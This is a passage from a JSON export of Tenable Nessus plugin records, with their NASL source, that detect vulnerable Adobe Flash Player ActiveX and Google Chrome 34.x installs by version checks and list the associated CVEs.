script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_activex_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nif (activex_init() != ACX_OK) audit(AUDIT_FN_FAIL, \"activex_init()\");\n\n# Adobe Flash Player CLSID\nclsid = '{D27CDB6E-AE6D-11cf-96B8-444553540000}';\n\nfile = activex_get_filename(clsid:clsid);\nif (isnull(file))\n{\n activex_end();\n audit(AUDIT_FN_FAIL, \"activex_get_filename\", \"NULL\");\n}\nif (!file)\n{\n activex_end();\n audit(AUDIT_ACTIVEX_NOT_FOUND, clsid);\n}\n\n# Get its version.\nversion = activex_get_fileversion(clsid:clsid);\nif (!version)\n{\n activex_end();\n audit(AUDIT_VER_FAIL, file);\n}\n\ninfo = '';\n\niver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(iver); i++)\n iver[i] = int(iver[i]);\n\n# < 13.0.0.206\nif (\n (report_paranoia > 1 || activex_get_killbit(clsid:clsid) == 0) &&\n (\n iver[0] < 13 ||\n (\n iver[0] == 13 &&\n (\n (iver[1] == 0 && iver[2] == 0 && iver[3] < 206)\n )\n )\n )\n)\n{\n info = '\\n Path : ' + file +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 13.0.0.206\\n';\n}\n\nport = kb_smb_transport();\n\nif (info != '')\n{\n if (report_verbosity > 0)\n {\n if (report_paranoia > 1)\n {\n report = info +\n '\\n' +\n 'Note, though, that Nessus did not check whether the kill bit was\\n' +\n \"set for the control's CLSID because of the Report Paranoia setting\" + '\\n' +\n 'in effect when this scan was run.\\n';\n }\n else\n {\n report = info +\n '\\n' +\n 'Moreover, its kill bit is not set so it is accessible via Internet\\n' +\n 'Explorer.\\n';\n }\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_HOST_NOT, 'affected');\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:05", "description": "The version of Google Chrome installed on the remote host is a version prior to 34.0.1847.116, and is thus affected by the following vulnerabilities :\n\n - A use-after-free error exists in the included Flash version that could lead to arbitrary code execution. (CVE-2014-0506)\n - A buffer overflow error exists in the included Flash version that could lead to arbitrary code execution. (CVE-2014-0507)\n - An unspecified error exists in the included Flash version that could allow a security bypass leading to information disclosure. (CVE-2014-0508)\n - A flaw exists related to IPC message injection. Combined with another vulnerability that allows compromising a renderer, a context-dependent attacker can bypass sandbox restrictions. (2014-1709)\n - An unspecified error exists in the included Flash version that could allow cross-site scripting attacks. (CVE-2014-0509)\n - An input-validation error exists that could allow universal cross-site scripting (UXSS) attacks. (CVE-2014-1716)\n - An unspecified out-of-bounds access error exists related to the V8 JavaScript engine. (CVE-2014-1717)\n - An integer overflow error exists related to the compositor. (CVE-2014-1718)\n - Use-after-free errors exist related to web workers, DOM processing, rendering, speech handling and forms handling. (CVE-2014-1719, CVE-2014-1720, CVE-2014-1722, CVE-2014-1724, CVE-2014-1727)\n - An unspecified memory corruption error exists related to the V8 JavaScript engine. (CVE-2014-1721)\n - An URL confusion error exists related to handling RTL characters. (CVE-2014-1723)\n - An out-of-bounds read error exists related to handling 'window property' processing. (CVE-2014-1725)\n - An unspecified error exists that could allow local cross-origin bypasses. (CVE-2014-1726)\n - Various, unspecified memory handling errors exist. (CVE-2014-1728)\n - Various, unspecified errors exist related to the V8 JavaScript engine. (CVE-2014-1729)", "cvss3": {}, "published": "2014-04-10T00:00:00", "type": "nessus", "title": "Google Chrome < 34.0.1847.116 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0506", "CVE-2014-0507", "CVE-2014-0508", "CVE-2014-0509", "CVE-2014-1716", "CVE-2014-1717", "CVE-2014-1718", "CVE-2014-1719", "CVE-2014-1720", "CVE-2014-1721", "CVE-2014-1722", "CVE-2014-1723", "CVE-2014-1724", "CVE-2014-1725", "CVE-2014-1726", "CVE-2014-1727", "CVE-2014-1728", "CVE-2014-1729"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "8208.PASL", "href": "https://www.tenable.com/plugins/nnm/8208", "sourceData": "Binary data 8208.pasl", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:31", "description": "The version of Google Chrome installed on the remote Mac OS X host is a version prior to 34.0.1847.116. It is, therefore, affected by the following vulnerabilities :\n\n - A use-after-free error exists in the included Flash version that could lead to arbitrary code execution.\n (CVE-2014-0506)\n\n - A buffer overflow error exists in the included Flash version that could lead to arbitrary code execution.\n (CVE-2014-0507)\n\n - An unspecified error exists in the included Flash version that could allow a security bypass leading to information disclosure. (CVE-2014-0508)\n\n - An unspecified error exists in the included Flash version that could allow cross-site scripting attacks.\n (CVE-2014-0509)\n\n - An unspecified flaw exists related to IPC message injection that allows an unauthenticated, remote attacker to bypass sandbox restrictions. (CVE-2014-1709)\n\n - An input validation error exists that could allow universal cross-site scripting (UXSS) attacks.\n (CVE-2014-1716)\n\n - An unspecified out-of-bounds access error exists related to the V8 JavaScript engine. (CVE-2014-1717)\n\n - An integer overflow error exists related to the compositor. (CVE-2014-1718)\n\n - Use-after-free errors exist related to web workers, DOM processing, rendering, speech handling and forms handling. (CVE-2014-1719, CVE-2014-1720, CVE-2014-1722, CVE-2014-1724, CVE-2014-1727)\n\n - An unspecified memory corruption error exists related to the V8 JavaScript engine. (CVE-2014-1721)\n\n - An URL confusion error exists related to handling RTL characters. (CVE-2014-1723)\n\n - An out-of-bounds read error exists related to handling 'window property' processing. (CVE-2014-1725)\n\n - An unspecified error exists that could allow local cross-origin bypasses. (CVE-2014-1726)\n\n - Various, unspecified memory handling errors exist.\n (CVE-2014-1728)\n\n - Various, unspecified errors exist related to the V8 JavaScript engine. (CVE-2014-1729)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2014-04-08T00:00:00", "type": "nessus", "title": "Google Chrome < 34.0.1847.116 Multiple Vulnerabilities (Mac OS X)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0506", "CVE-2014-0507", "CVE-2014-0508", "CVE-2014-0509", "CVE-2014-1709", "CVE-2014-1716", "CVE-2014-1717", "CVE-2014-1718", "CVE-2014-1719", "CVE-2014-1720", "CVE-2014-1721", "CVE-2014-1722", "CVE-2014-1723", "CVE-2014-1724", "CVE-2014-1725", "CVE-2014-1726", "CVE-2014-1727", "CVE-2014-1728", "CVE-2014-1729"], "modified": "2019-11-26T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "MACOSX_GOOGLE_CHROME_34_0_1847_116.NASL", "href": "https://www.tenable.com/plugins/nessus/73420", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73420);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\n \"CVE-2014-0506\",\n \"CVE-2014-0507\",\n \"CVE-2014-0508\",\n \"CVE-2014-0509\",\n \"CVE-2014-1709\",\n \"CVE-2014-1716\",\n \"CVE-2014-1717\",\n \"CVE-2014-1718\",\n \"CVE-2014-1719\",\n \"CVE-2014-1720\",\n \"CVE-2014-1721\",\n \"CVE-2014-1722\",\n \"CVE-2014-1723\",\n \"CVE-2014-1724\",\n \"CVE-2014-1725\",\n \"CVE-2014-1726\",\n \"CVE-2014-1727\",\n \"CVE-2014-1728\",\n \"CVE-2014-1729\"\n );\n script_bugtraq_id(66704);\n\n script_name(english:\"Google Chrome < 34.0.1847.116 Multiple Vulnerabilities (Mac OS X)\");\n script_summary(english:\"Checks version number of Google Chrome\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host contains a web browser that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Mac OS X host is\na version prior to 34.0.1847.116. It is, therefore, affected by the\nfollowing vulnerabilities :\n\n - A use-after-free error exists in the included Flash\n version that could lead to arbitrary code execution.\n (CVE-2014-0506)\n\n - A buffer overflow error exists in the included Flash\n version that could lead to arbitrary code execution.\n (CVE-2014-0507)\n\n - An unspecified error exists in the included Flash\n version that could allow a security bypass leading to\n information disclosure. (CVE-2014-0508)\n\n - An unspecified error exists in the included Flash\n version that could allow cross-site scripting attacks.\n (CVE-2014-0509)\n\n - An unspecified flaw exists related to IPC message\n injection that allows an unauthenticated, remote\n attacker to bypass sandbox restrictions. (CVE-2014-1709)\n\n - An input validation error exists that could allow\n universal cross-site scripting (UXSS) attacks.\n (CVE-2014-1716)\n\n - An unspecified out-of-bounds access error exists\n related to the V8 JavaScript engine. (CVE-2014-1717)\n\n - An integer overflow error exists related to the\n compositor. (CVE-2014-1718)\n\n - Use-after-free errors exist related to web workers,\n DOM processing, rendering, speech handling and forms\n handling. (CVE-2014-1719, CVE-2014-1720, CVE-2014-1722,\n CVE-2014-1724, CVE-2014-1727)\n\n - An unspecified memory corruption error exists related\n to the V8 JavaScript engine. (CVE-2014-1721)\n\n - An URL confusion error exists related to handling RTL\n characters. (CVE-2014-1723)\n\n - An out-of-bounds read error exists related to handling\n 'window property' processing. (CVE-2014-1725)\n\n - An unspecified error exists that could allow local\n cross-origin bypasses. (CVE-2014-1726)\n\n - Various, unspecified memory handling errors exist.\n (CVE-2014-1728)\n\n - Various, unspecified errors exist related to the V8\n JavaScript engine. (CVE-2014-1729)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # http://googlechromereleases.blogspot.com/2014/04/stable-channel-update.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6fd7963a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome 34.0.1847.116 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0506\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/04/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"MacOSX/Google Chrome/Installed\");\n\ngoogle_chrome_check_version(fix:'34.0.1847.116', severity:SECURITY_HOLE, xss:TRUE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:24", "description": "The version of Google Chrome installed on the remote host is a version prior to 34.0.1847.116. It is, therefore, affected by the following vulnerabilities :\n\n - A use-after-free error exists in the included Flash version that could lead to arbitrary code execution.\n (CVE-2014-0506)\n\n - A buffer overflow error exists in the included Flash version that could lead to arbitrary code execution.\n (CVE-2014-0507)\n\n - An unspecified error exists in the included Flash version that could allow a security bypass leading to information disclosure. (CVE-2014-0508)\n\n - An unspecified error exists in the included Flash version that could allow cross-site scripting attacks.\n (CVE-2014-0509)\n\n - An unspecified flaw exists related to IPC message injection that allows an unauthenticated, remote attacker to bypass sandbox restrictions. (CVE-2014-1709) \n - An input validation error exists that could allow universal cross-site scripting (UXSS) attacks.\n (CVE-2014-1716)\n\n - An unspecified out-of-bounds access error exists related to the V8 JavaScript engine. (CVE-2014-1717)\n\n - An integer overflow error exists related to the compositor. (CVE-2014-1718)\n\n - Use-after-free errors exist related to web workers, DOM processing, rendering, speech handling and forms handling. (CVE-2014-1719, CVE-2014-1720, CVE-2014-1722, CVE-2014-1724, CVE-2014-1727)\n\n - An unspecified memory corruption error exists related to the V8 JavaScript engine. (CVE-2014-1721)\n\n - An URL confusion error exists related to handling RTL characters. (CVE-2014-1723)\n\n - An out-of-bounds read error exists related to handling 'window property' processing. (CVE-2014-1725)\n\n - An unspecified error exists that could allow local cross-origin bypasses. (CVE-2014-1726)\n\n - Various, unspecified memory handling errors exist.\n (CVE-2014-1728)\n\n - Various, unspecified errors exist related to the V8 JavaScript engine. (CVE-2014-1729)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2014-04-08T00:00:00", "type": "nessus", "title": "Google Chrome < 34.0.1847.116 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0506", "CVE-2014-0507", "CVE-2014-0508", "CVE-2014-0509", "CVE-2014-1709", "CVE-2014-1716", "CVE-2014-1717", "CVE-2014-1718", "CVE-2014-1719", "CVE-2014-1720", "CVE-2014-1721", "CVE-2014-1722", "CVE-2014-1723", "CVE-2014-1724", "CVE-2014-1725", "CVE-2014-1726", "CVE-2014-1727", "CVE-2014-1728", "CVE-2014-1729"], "modified": "2022-04-07T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "GOOGLE_CHROME_34_0_1847_116.NASL", "href": "https://www.tenable.com/plugins/nessus/73419", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73419);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/07\");\n\n script_cve_id(\n \"CVE-2014-0506\",\n \"CVE-2014-0507\",\n \"CVE-2014-0508\",\n \"CVE-2014-0509\",\n \"CVE-2014-1709\",\n \"CVE-2014-1716\",\n \"CVE-2014-1717\",\n \"CVE-2014-1718\",\n \"CVE-2014-1719\",\n \"CVE-2014-1720\",\n \"CVE-2014-1721\",\n \"CVE-2014-1722\",\n \"CVE-2014-1723\",\n \"CVE-2014-1724\",\n \"CVE-2014-1725\",\n \"CVE-2014-1726\",\n \"CVE-2014-1727\",\n \"CVE-2014-1728\",\n \"CVE-2014-1729\"\n );\n script_bugtraq_id(66704);\n\n script_name(english:\"Google Chrome < 34.0.1847.116 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host contains a web browser that is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote host is a version\nprior to 34.0.1847.116. It is, therefore, affected by the following\nvulnerabilities :\n\n - A use-after-free error exists in the included Flash\n version that could lead to arbitrary code execution.\n (CVE-2014-0506)\n\n - A buffer overflow error exists in the included Flash\n version that could lead to arbitrary code execution.\n (CVE-2014-0507)\n\n - An unspecified error exists in the included Flash\n version that could allow a security bypass leading to\n information disclosure. (CVE-2014-0508)\n\n - An unspecified error exists in the included Flash\n version that could allow cross-site scripting attacks.\n (CVE-2014-0509)\n\n - An unspecified flaw exists related to IPC message\n injection that allows an unauthenticated, remote\n attacker to bypass sandbox restrictions. (CVE-2014-1709)\n \n - An input validation error exists that could allow\n universal cross-site scripting (UXSS) attacks.\n (CVE-2014-1716)\n\n - An unspecified out-of-bounds access error exists\n related to the V8 JavaScript engine. (CVE-2014-1717)\n\n - An integer overflow error exists related to the\n compositor. (CVE-2014-1718)\n\n - Use-after-free errors exist related to web workers,\n DOM processing, rendering, speech handling and forms\n handling. (CVE-2014-1719, CVE-2014-1720, CVE-2014-1722,\n CVE-2014-1724, CVE-2014-1727)\n\n - An unspecified memory corruption error exists related\n to the V8 JavaScript engine. (CVE-2014-1721)\n\n - An URL confusion error exists related to handling RTL\n characters. (CVE-2014-1723)\n\n - An out-of-bounds read error exists related to handling\n 'window property' processing. (CVE-2014-1725)\n\n - An unspecified error exists that could allow local\n cross-origin bypasses. (CVE-2014-1726)\n\n - Various, unspecified memory handling errors exist.\n (CVE-2014-1728)\n\n - Various, unspecified errors exist related to the V8\n JavaScript engine. (CVE-2014-1729)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # http://googlechromereleases.blogspot.com/2014/04/stable-channel-update.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6fd7963a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome 34.0.1847.116 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0506\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/04/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"SMB/Google_Chrome/Installed\");\ninstalls = get_kb_list(\"SMB/Google_Chrome/*\");\n\ngoogle_chrome_check_version(installs:installs, fix:'34.0.1847.116', severity:SECURITY_HOLE, xss:TRUE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-02T14:09:14", "description": "The version of Google Chrome installed on the remote host is a version prior to 34.0.1847.131. It is, therefore, affected by the following vulnerabilities :\n\n - A buffer overflow error exists related to the included version of Flash Player. (CVE-2014-0515)\n\n - Type confusion errors exist related to the V8 JavaScript engine and DOM handling. (CVE-2014-1730, CVE-2014-1731)\n\n - A use-after-free error exists related to speech recognition processing. (CVE-2014-1732)\n\n - An error exists related to compiling in 'Seccomp-BPF'.\n (CVE-2014-1733)\n\n - Various, unspecified errors exist. (CVE-2014-1734)\n\n - Various, unspecified errors exist related to the V8 JavaScript engine. (CVE-2014-1735)\n\n - An integer overflow error exists related to the V8 JavaScript engine. (CVE-2014-1736)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2014-04-25T00:00:00", "type": "nessus", "title": "Google Chrome < 34.0.1847.131 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0515", "CVE-2014-1730", "CVE-2014-1731", "CVE-2014-1732", "CVE-2014-1733", "CVE-2014-1734", "CVE-2014-1735", "CVE-2014-1736"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "GOOGLE_CHROME_34_0_1847_131.NASL", "href": "https://www.tenable.com/plugins/nessus/73710", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73710);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2014-0515\",\n \"CVE-2014-1730\",\n \"CVE-2014-1731\",\n \"CVE-2014-1732\",\n \"CVE-2014-1733\",\n \"CVE-2014-1734\",\n \"CVE-2014-1735\",\n \"CVE-2014-1736\"\n );\n script_bugtraq_id(\n 67082,\n 67092,\n 67521,\n 67572\n );\n\n script_name(english:\"Google Chrome < 34.0.1847.131 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host contains a web browser that is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote host is a version\nprior to 34.0.1847.131. It is, therefore, affected by the following\nvulnerabilities :\n\n - A buffer overflow error exists related to the included\n version of Flash Player. (CVE-2014-0515)\n\n - Type confusion errors exist related to the V8\n JavaScript engine and DOM handling. (CVE-2014-1730,\n CVE-2014-1731)\n\n - A use-after-free error exists related to speech\n recognition processing. (CVE-2014-1732)\n\n - An error exists related to compiling in 'Seccomp-BPF'.\n (CVE-2014-1733)\n\n - Various, unspecified errors exist. (CVE-2014-1734)\n\n - Various, unspecified errors exist related to the V8\n JavaScript engine. (CVE-2014-1735)\n\n - An integer overflow error exists related to the V8\n JavaScript engine. (CVE-2014-1736)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # http://googlechromereleases.blogspot.com/2014/04/stable-channel-update_24.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b5291952\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb14-13.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome 34.0.1847.131 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0515\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player Shader Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/04/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"SMB/Google_Chrome/Installed\");\ninstalls = get_kb_list(\"SMB/Google_Chrome/*\");\n\ngoogle_chrome_check_version(installs:installs, fix:'34.0.1847.131', severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-28T14:16:22", "description": "The version of Google Chrome installed on the remote Mac OS X host is a version prior to 34.0.1847.131. It is, therefore, affected by the following vulnerabilities :\n\n - A buffer overflow error exists related to the included version of Flash Player. (CVE-2014-0515)\n\n - Type confusion errors exist related to the V8 JavaScript engine and DOM handling. (CVE-2014-1730, CVE-2014-1731)\n\n - A use-after-free error exists related to speech recognition processing. (CVE-2014-1732)\n\n - An error exists related to compiling in 'Seccomp-BPF'.\n (CVE-2014-1733)\n\n - Various, unspecified errors exist. (CVE-2014-1734)\n\n - Various, unspecified errors exist related to the V8 JavaScript engine. (CVE-2014-1735)\n\n - An integer overflow error exists related to the V8 JavaScript engine. (CVE-2014-1736)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2014-04-25T00:00:00", "type": "nessus", "title": "Google Chrome < 34.0.1847.131 Multiple Vulnerabilities (Mac OS X)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0515", "CVE-2014-1730", "CVE-2014-1731", "CVE-2014-1732", "CVE-2014-1733", "CVE-2014-1734", "CVE-2014-1735", "CVE-2014-1736"], "modified": "2019-11-26T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "MACOSX_GOOGLE_CHROME_34_0_1847_131.NASL", "href": "https://www.tenable.com/plugins/nessus/73711", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73711);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\n \"CVE-2014-0515\",\n \"CVE-2014-1730\",\n \"CVE-2014-1731\",\n \"CVE-2014-1732\",\n \"CVE-2014-1733\",\n \"CVE-2014-1734\",\n \"CVE-2014-1735\",\n \"CVE-2014-1736\"\n );\n script_bugtraq_id(67082, 67092);\n\n script_name(english:\"Google Chrome < 34.0.1847.131 Multiple Vulnerabilities (Mac OS X)\");\n script_summary(english:\"Checks version number of Google Chrome\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host contains a web browser that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Mac OS X host is\na version prior to 34.0.1847.131. It is, therefore, affected by the\nfollowing vulnerabilities :\n\n - A buffer overflow error exists related to the included\n version of Flash Player. (CVE-2014-0515)\n\n - Type confusion errors exist related to the V8\n JavaScript engine and DOM handling. (CVE-2014-1730,\n CVE-2014-1731)\n\n - A use-after-free error exists related to speech\n recognition processing. (CVE-2014-1732)\n\n - An error exists related to compiling in 'Seccomp-BPF'.\n (CVE-2014-1733)\n\n - Various, unspecified errors exist. (CVE-2014-1734)\n\n - Various, unspecified errors exist related to the V8\n JavaScript engine. (CVE-2014-1735)\n\n - An integer overflow error exists related to the V8\n JavaScript engine. (CVE-2014-1736)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # http://googlechromereleases.blogspot.com/2014/04/stable-channel-update_24.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b5291952\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb14-13.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome 34.0.1847.131 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0515\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player Shader Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/04/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n 